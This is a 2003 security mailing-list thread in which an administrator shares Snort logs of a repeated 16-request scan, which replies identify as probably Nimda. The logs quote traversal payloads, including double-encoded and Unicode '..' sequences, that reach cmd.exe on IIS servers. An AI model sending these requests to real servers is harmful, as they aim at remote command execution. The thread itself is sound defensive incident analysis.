Security Incidents mailing list archives

Re: Same sequence... Resolved

From: "Dejan Markovic" <dejanmarkovic () hotmail com>
Date: Tue, 2 Dec 2003 14:47:49 -0500

Hi Guys,

Thanks much to everyone, I am in the process of contacting the owners of the
boxes in question, and yes it does seem like the real thing, as the attacks
are escalating. My boxes are totally patched and the logs all read 404. Keep
you posted on the outcome. Talk to you later and thanks once more.

Regards,
Dan

----- Original Message ----- 
From: "Henderson, Dennis K." <Dennis.Henderson () umb com>
To: "Dejan Markovic" <dejanmarkovic () hotmail com>;
<INCIDENTS () securityfocus com>
Sent: Tuesday, December 02, 2003 7:26 AM
Subject: RE: Same sequence...


Its probably a real nimda infected host.

Dennis

-----Original Message-----
From: Dejan Markovic [mailto:dejanmarkovic () hotmail com]
Sent: Monday, December 01, 2003 2:02 PM
To: INCIDENTS () securityfocus com
Subject: Same sequence...


Hi Guys,

Sent this one to the wrong group the first time, thanks J, so here goes.

Does anyone know which tool is being used for this scan. Snort has been
logging the same sequence of scans from various IPs to all Web servers on my
network, regardless that some are IIS and the others Apache. The data is
included below.

====================================================================

(1) WEB-IIS CodeRed v2 root.exe access  GET /scripts/root.exe?/c+dir
HTTP/1.0

(2) WEB-IIS CodeRed v2 root.exe access  GET /MSADC/root.exe?/c+dir HTTP/1.0

(3) WEB-IIS cmd.exe access   GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0

(4) WEB-IIS cmd.exe access   GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0

(5) WEB-IIS unicode directory traversal attempt GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(6) WEB-FRONTPAGE /_vti_bin/ access  GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0

(7) WEB-IIS _mem_bin access   GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0

(8) WEB-IIS unicode directory traversal attempt GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0

(9) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(10) WEB-IIS cmd.exe access   GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(11) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(12) WEB-IIS unicode directory traversal attempt GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(13) WEB-IIS cmd.exe access   GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(14) WEB-IIS cmd.exe access   GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(15) WEB-IIS cmd.exe access   GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0

(16) WEB-IIS cmd.exe access   GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

====================================================================

The whole scan takes from 2 seconds to under a minute in some cases, but
there is always 16 requests in the same order. Sorry if this has already
been on the list and thanks.

Regards,
Dan

---------------------------------------------------------------------------
----------------------------------------------------------------------------


---------------------------------------------------------------------------
----------------------------------------------------------------------------


---------------------------------------------------------------------------
----------------------------------------------------------------------------

Current thread:

Same sequence... Dejan Markovic (Dec 01)
- Re: Same sequence... James C. Slora Jr. (Dec 02)
- <Possible follow-ups>
- RE: Same sequence... Henderson, Dennis K. (Dec 02)
  - Re: Same sequence... Dejan Markovic (Dec 02)
  - Re: Same sequence... Resolved Dejan Markovic (Dec 02)